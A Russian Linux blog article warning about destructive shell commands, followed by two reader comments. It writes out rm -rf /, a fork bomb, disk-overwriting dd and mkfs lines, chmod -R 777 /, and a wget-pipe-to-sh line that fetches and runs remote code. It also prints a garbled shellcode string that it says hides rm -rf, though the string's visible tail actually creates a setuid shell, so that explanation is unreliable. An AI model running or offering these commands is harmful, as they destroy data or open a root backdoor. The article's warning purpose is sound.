10 самых опасных команд, которые никогда не следует выполнять в Linux

You are currently viewing 10 самых опасных команд, которые никогда не следует выполнять в Linux

Интерфейс командной строки — мощная и удобная утилита для администрирования системы Linux. Он обеспечивает быстрый и универсальный способ запуска системы, особенно при управлении безголовыми системами, не имеющими графического интерфейса.

Хотя командная строка полезна для управления вашей системой, она сопряжена с риском. Выполнение неправильных команд может нанести вред и непоправимый ущерб вашей системе. В этом руководстве мы составили список некоторых из самых рискованных команд, которые вам не следует выполнять в вашей системе.

1. rm -rf/ команда

Команда rm — это команда Linux, используемая для удаления файлов и каталогов в зависимости от используемых аргументов. Однако следует соблюдать крайнюю осторожность при использовании команды rm, так как небольшая опечатка или ошибка могут привести к непоправимому повреждению системы.

При выполнении от имени пользователя root с параметром -rf / команда рекурсивно удаляет все файлы и каталоги в вашей системе, начиная с корня (/), который является самым высоким в структуре файловой иерархии Linux. Короче говоря, команда rm -rf / полностью стирает вашу систему, что приводит к поломке и невозможности восстановления системы.

Вот некоторые из параметров, используемых с командой rm.

  • Команда rm в Linux используется для удаления файлов.
  • Команда rm -r рекурсивно удаляет папку, даже пустую папку.
  • Команда rm -f удаляет «Файл только для чтения» без запроса.
  • rm -rf / : Принудительно удалить все в корневом каталоге.
  • rm -rf * : Принудительно удалить все в текущем каталоге/рабочем каталоге.
  • rm -rf . : принудительное удаление текущей папки и подпапок.

На самом деле, когда вы запускаете команду как обычный пользователь, вы получите два предупреждения на терминале.

Чтобы предотвратить случайное удаление файлов командой «rm», создайте псевдоним команды «rm» как «rm -i» в файле «.bashrc», он будет запрашивать подтверждение каждого удаления.

2. :(){:|:&};: команда

Вышеупомянутое на самом деле форк-бомба. Она работает, создавая функцию с именем ‘:’, которая вызывает себя дважды, один раз на переднем плане и один раз в фоновом режиме. Функция выполняется многократно и при этом потребляет все системные ресурсы, что приводит к сбою системы.

На самом деле, команда fork bomb — это, по сути, форма DoS-атаки (отказ в обслуживании). Его также называют вирусом Wabbit или Rabbit. Хуже всего то, что вам не нужно быть root, чтобы запустить эту атаку.

К счастью, вы можете защитить себя от этой атаки, ограничив количество процессов, запускаемых локальными пользователями, примерно до 4000.

Вы можете сделать это, выполнив команду:

$ ulimit -S -u 4000

Позже вы можете проверить это с помощью команды:

$ ulimit -u

3. Команда >/dev/sda

Выполнение команды, за которой следует >/dev/sda, перезаписывает блок /dev/sda на вашем жестком диске. Этот блок содержит данные файловой системы и при перезаписи приводит к необратимому повреждению системы.

4. mv папка /dev/null

Еще одна опасная операция, которую вам не следует выполнять, — это перемещение каталога или файла в /dev/null. Файл /dev/null — это файл особого типа, известный как нулевое устройство или «черная дыра». Все, что перемещается в /dev/null, отбрасывается и уничтожается.

Следующая команда перемещает все содержимое домашнего каталога пользователя в /dev/null, тем самым удаляя все данные, содержащиеся в домашнем каталоге пользователя.

# mv /home/user/* /dev/null

5. wget http://malicious_source -O- | sh

Команда wget — это команда, которая загружает файлы с веб-сервера или файлового сервера. Приведенная выше команда загружает скрипт из вредоносного источника, а затем выполняет его.

6. mkfs.ext3 /dev/sda

Команда mkfs создает новую файловую систему (ext2, ext3, ext4 и т. д.) на отформатированном устройстве хранения, в большинстве случаев на разделе жесткого диска. Выполнение команды mkfs на разделе стирает все хранящиеся в нем данные.

Форматирование всего диска (например, mkfs.ext3 /dev/sda) полезно при форматировании разделов диска, но оно приводит к сбою системы и оставляет ее в невосстановимом состоянии. Это происходит потому, что он уничтожает все системные файлы вместе с вашими личными данными.

Команда также может принимать другие формы, как показано ниже.

# mkfs.ext4 /dev/sda
# mkfs.xfs /dev/sda
# mkfs.btrfs /dev/sda

7. Команда > файл

> Файл стирает содержимое файла и оставляет его пустым. Это синоним команды cat /dev/null > file. Поэтому следует соблюдать осторожность при использовании операторов перенаправления в системе Linux.

Ниже приведена демонстрация того, как эта команда перезаписывает текстовый файл. Вы можете себе представить катастрофу, которую может вызвать эта команда, если задействованный файл является файлом конфигурации.

8. ^foo^bar

Команда ^foo^bar столь же опасна, сколь и полезна, в зависимости от того, как она выполняется. Хотя это позволяет вам редактировать ранее выполненные команды и выполнять их снова, это может иметь катастрофические последствия, если вы не заинтересованы в изменениях, внесенных в команды перед их запуском.

9. dd if=/dev/random of=/dev/sda

Приведенная выше команда стирает блок /dev/sda и записывает в блок случайные ненужные данные. Ваша система останется на непоследовательной и невосстановимой стадии.

10. Chmod -R 777 /

Хотя это может не привести к немедленному сбою вашей системы Linux, команда chmod -R 777 / рекурсивно назначает все разрешения (чтение, запись и выполнение) всем файлам в вашей системе Linux, начиная с корня.

Это эффективно раскрывает все важные файлы конфигурации и другие файлы для всех пользователей, и это представляет огромную угрозу безопасности для вашей системы. Любой с гнусными намерениями может возиться с важными файлами и легко сломать вашу систему.

11. Скрытая команда

Приведенная ниже команда — это не что иное, как первая команда выше (rm -rf). Здесь коды спрятаны в шестнадцатеричном формате, чтобы несведущий пользователь мог быть обманут. Выполнение приведенного ниже кода в вашем терминале сотрет ваш корневой раздел.

Эта команда здесь показывает, что угроза может быть скрытой и иногда не обнаруживаемой. Вы должны осознавать, что вы делаете и каков будет результат. Не компилируйте/запускайте коды из неизвестного источника.

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “xebx3ex5bx31xc0x50x54x5ax83xecx64x68″
“xffxffxffxffx68xdfxd0xdfxd9x68x8dx99″
“xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7″
“x56x04xf7x56x08xf7x56x0cx83xc4x74x56″
“x8dx73x08x56x53x54x59xb0x0bxcdx80x31″
“xc0x40xebxf9xe8xbdxffxffxffx2fx62x69″
“x6ex2fx73x68x00x2dx63x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

Примечание. Не выполняйте ни одну из вышеперечисленных команд в терминале или оболочке Linux, а также на компьютере друга или школьного компьютера. Если вы хотите протестировать их, запустите их на виртуальной машине.

Любое несоответствие или потеря данных из-за выполнения вышеуказанной команды приведет к поломке вашей системы, за что ни Автор статьи, ни linuxthebest не несут ответственности.

241320cookie-check10 самых опасных команд, которые никогда не следует выполнять в Linux

Автор публикации

не в сети 4 дня

walle9054

Комментарии: 0Публикации: 52Регистрация: 22-11-2021
Если Вам понравилась статья, то поделитесь ею в соц.сетях:
guest

2 комментариев
Самый новый
Самый старший Наибольшее количество голосов
Inline Feedbacks
View all comments
VINRARUS

А мені завжди подобалась команда kill 1

Юрий

Хочется спросить у Администратора сайта и его хозяина: Почему Ваш Сайт — самый тормознутый в сети? Почему он так долго загружается и Дилы — практически не обновляются!? Пользоваться и Наслаждаться Вашим Ресурсом очень тяжело! Может быть, нужно что-то делать, а не держать сайт «для галочки и, что он у вас есть»!?